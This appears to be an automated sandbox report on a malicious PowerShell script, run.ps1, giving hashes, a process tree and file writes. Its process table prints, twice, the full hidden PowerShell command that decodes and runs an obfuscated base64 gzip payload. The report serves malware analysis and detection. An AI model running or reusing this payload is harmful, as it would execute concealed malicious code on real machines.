File name: | run.ps1 |
Full analysis: | https://app.any.run/tasks/2b1e33c5-a536-4f1b-912b-aadb8bc11c5a |
Verdict: | Malicious activity |
Analysis date: | December 02, 2019, 19:33:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | EA0AABCC5E2DB8EFA1355D58A4F64F0B |
SHA1: | E59F4B7413A495B20F57012D066B22377115D501 |
SHA256: | 71B5C7116B992ED1613F29DF506737BDD2270129341483A87941CCA6DD4EF8C1 |
SSDEEP: | 48:oVV3XWMaM8l1yJLo+YHVC+S9lKg8NLtNFscwj1ch1tLPjZCKCVVYWX:oX2XyJk+YE+SH8NLLFsDj2h/LPtbC7Yq |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2724 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\run.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3852 | "C:\WINDOWS\system32\cmd.exe" /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){=C:\Windows+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{='powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGQHkFwCA7VWa2+bSBT9nEj5D6iyZFAcg1M3yUaKtIONbVyTmmDj11orDANMPTwWhtik2/++FxvSdJtW7UqLkJjHfZ57Zi5uFtqMRCG3d7lPZ6cnYyuxAo6vuXGDqzl74eQEFmtZep23uDuOX6E47kaBRcL17W0nSxIcsuO82ccMpSkONpTglBe4v7mZjxN88WHzEduM+8TV/mz2abSxaCmWdyzbx9wFCp1ibxTZVhFJ04gpYXz9jz/qwuqitW4qf2UWTfm6kacMB02H0rrAfRYKh5M8xnxdI3YSpZHLmjMSvr1sTsPUcvE9WHvEGmZ+5KR1AdKAN8EsS0LumFBh4bjP12E4TiIbOU6C07Te4FaF7dV6/Tu/Kh0/ZCEjAW6qIcNJFBs4eSQ2TpsDK3QofsDuGrQMlpDQWwsCiD1GW8zXwozSBvcrZvh7vKtg+1kl/qUSSI1ZIjSgjq8lqkVORvFRtf5KpFB8AZ4jAQC4z2enZ6duRZRcf0kUGJ2sDmMMkfHjKCUHqTtOanAauLBYlOQwrU2SDAvrZ1y52narDYaN7xtoVdIgu2nZbVhamRFx1qBSlrO2uZ48FOvfp2UXuyTE3Ty0AmJXzONfgxi7FB9SbFZi9xAUXy83sNPFFHsWKzArKv2NmhIQ9qwrZ4Q6OEE2lCmFqKCCwtfBHMvA19VQwwGAdJwD9Wou8B1X0iXH88p7MQeheodaadrgxhkcOLvBGdii2GlwKExJuYUyFh2G9S/hahllxLZSVplbCxWOpb9OFKYsyWyoG+Q+MWJsE4sWUDS4AXGwnBvEq/zWXwWiY1EKpwAsPUIhYKUAwGAFGxII8Vh5oWlgpgYxxQEIHY5+j1oeHPSS7Af+WB526v8OseLykbgFGBUKLwKEChs0Yg3OJAmDG6QAtqDRf/T/4vI4RNJJcFkMvjoiKzlnBbVrZFZwssTlgELCAIFeEgWyleKr9vGW4N+ICum+G3ejJwSP0nvQTdmYmktVc4bUUJmxUMho6vsqaakezPOp4o2ZFL+fTAZDoztASXfvu0hNVWUg53pLRvaAXJtDeToFPdIZ6R/3KnLkwJt7i85OHftzFRx1Rp7qwVdWfVuWlpInS73OyJB9hUjIM/SB3m4tVfGGyuTJUA00mD37e/ajtNuD+X6C7rUh8nsfnF7rsnfQ3xb6y21/1FUOc7uY64tUIQr4UXoL3fTxzIzlmdJb6maseuc7TzdHYrvny7Cukv0oNkR4Wq3hY+g8afTmSYNwdXM5JHipejj3kI6QsQipsdl1EOpfd3xddaXeFNa2EzXc65tYc/LFQPzN1AiOI6QrCPUonMkAWbuu2JpFsm6+06eKtM+n0n6nfBR3ChnutuV32r+68kS3PRZNQw0Hli9DvPmwvSXDc9gLLFNauKJZ4NfZhuJTOKdXQ+2AKeSjgw4pMLO8B9A76iAWqnNRND3RQy41Ve9G9+ZReGltwfbMQxAh5Ai1doeqZkOslGyn53OxNYV4pGC4l4pYg+EN2LvcvmLT8AFbZ2khuYhDnvUjNNv2rzr5zViDPMwW2AzNbDIbgE2IOdveFDBDfbtGJ+wb6vzS2TzI4rmzsDx5mZ0j570Xy8RJxJZ+d/emOAVwDGobw7K8FwT/Xm/SrCT1LQrEh55TXTe9KOmVnWQckUKD5+HXY4uTEFPo3dDdqwOLKI3soolBx4H2eWxqRY+dwvDt5asjgXsWFL50tmrp9nYJEcIFQGbNEQ495jek/VtJglYl7dsSJPjzOXWiOOfBUKNodEdMjobpwbBQXAg1oEnb+D+hKm8hHz7Oj6H6svaD3Z+CT2qU6X6z/vXCL8H5i3nPLMJAzoBblOJjH38t/ZIUL/5xDhWBqrvlU/ynfsjYxT38+5yd/gPx73r/DgsAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';.UseShellExecute=False;.RedirectStandardOutput=True;.WindowStyle='Hidden';.CreateNoWindow=True;=[System.Diagnostics.Process]::Start();" | C:\WINDOWS\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4028 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){=C:\Windows+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{='powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGQHkFwCA7VWa2+bSBT9nEj5D6iyZFAcg1M3yUaKtIONbVyTmmDj11orDANMPTwWhtik2/++FxvSdJtW7UqLkJjHfZ57Zi5uFtqMRCG3d7lPZ6cnYyuxAo6vuXGDqzl74eQEFmtZep23uDuOX6E47kaBRcL17W0nSxIcsuO82ccMpSkONpTglBe4v7mZjxN88WHzEduM+8TV/mz2abSxaCmWdyzbx9wFCp1ibxTZVhFJ04gpYXz9jz/qwuqitW4qf2UWTfm6kacMB02H0rrAfRYKh5M8xnxdI3YSpZHLmjMSvr1sTsPUcvE9WHvEGmZ+5KR1AdKAN8EsS0LumFBh4bjP12E4TiIbOU6C07Te4FaF7dV6/Tu/Kh0/ZCEjAW6qIcNJFBs4eSQ2TpsDK3QofsDuGrQMlpDQWwsCiD1GW8zXwozSBvcrZvh7vKtg+1kl/qUSSI1ZIjSgjq8lqkVORvFRtf5KpFB8AZ4jAQC4z2enZ6duRZRcf0kUGJ2sDmMMkfHjKCUHqTtOanAauLBYlOQwrU2SDAvrZ1y52narDYaN7xtoVdIgu2nZbVhamRFx1qBSlrO2uZ48FOvfp2UXuyTE3Ty0AmJXzONfgxi7FB9SbFZi9xAUXy83sNPFFHsWKzArKv2NmhIQ9qwrZ4Q6OEE2lCmFqKCCwtfBHMvA19VQwwGAdJwD9Wou8B1X0iXH88p7MQeheodaadrgxhkcOLvBGdii2GlwKExJuYUyFh2G9S/hahllxLZSVplbCxWOpb9OFKYsyWyoG+Q+MWJsE4sWUDS4AXGwnBvEq/zWXwWiY1EKpwAsPUIhYKUAwGAFGxII8Vh5oWlgpgYxxQEIHY5+j1oeHPSS7Af+WB526v8OseLykbgFGBUKLwKEChs0Yg3OJAmDG6QAtqDRf/T/4vI4RNJJcFkMvjoiKzlnBbVrZFZwssTlgELCAIFeEgWyleKr9vGW4N+ICum+G3ejJwSP0nvQTdmYmktVc4bUUJmxUMho6vsqaakezPOp4o2ZFL+fTAZDoztASXfvu0hNVWUg53pLRvaAXJtDeToFPdIZ6R/3KnLkwJt7i85OHftzFRx1Rp7qwVdWfVuWlpInS73OyJB9hUjIM/SB3m4tVfGGyuTJUA00mD37e/ajtNuD+X6C7rUh8nsfnF7rsnfQ3xb6y21/1FUOc7uY64tUIQr4UXoL3fTxzIzlmdJb6maseuc7TzdHYrvny7Cukv0oNkR4Wq3hY+g8afTmSYNwdXM5JHipejj3kI6QsQipsdl1EOpfd3xddaXeFNa2EzXc65tYc/LFQPzN1AiOI6QrCPUonMkAWbuu2JpFsm6+06eKtM+n0n6nfBR3ChnutuV32r+68kS3PRZNQw0Hli9DvPmwvSXDc9gLLFNauKJZ4NfZhuJTOKdXQ+2AKeSjgw4pMLO8B9A76iAWqnNRND3RQy41Ve9G9+ZReGltwfbMQxAh5Ai1doeqZkOslGyn53OxNYV4pGC4l4pYg+EN2LvcvmLT8AFbZ2khuYhDnvUjNNv2rzr5zViDPMwW2AzNbDIbgE2IOdveFDBDfbtGJ+wb6vzS2TzI4rmzsDx5mZ0j570Xy8RJxJZ+d/emOAVwDGobw7K8FwT/Xm/SrCT1LQrEh55TXTe9KOmVnWQckUKD5+HXY4uTEFPo3dDdqwOLKI3soolBx4H2eWxqRY+dwvDt5asjgXsWFL50tmrp9nYJEcIFQGbNEQ495jek/VtJglYl7dsSJPjzOXWiOOfBUKNodEdMjobpwbBQXAg1oEnb+D+hKm8hHz7Oj6H6svaD3Z+CT2qU6X6z/vXCL8H5i3nPLMJAzoBblOJjH38t/ZIUL/5xDhWBqrvlU/ynfsjYxT38+5yd/gPx73r/DgsAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';.UseShellExecute=False;.RedirectStandardOutput=True;.WindowStyle='Hidden';.CreateNoWindow=True;=[System.Diagnostics.Process]::Start();" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2724 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2FSSRLJOSSHRCNQR7PMB.temp | — | |
MD5:— | SHA256:— | |||
4028 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KEZEDF3IYDU4KBJL7AYJ.temp | — | |
MD5:— | SHA256:— | |||
2724 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a756.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
4028 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
4028 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39aa25.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2724 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |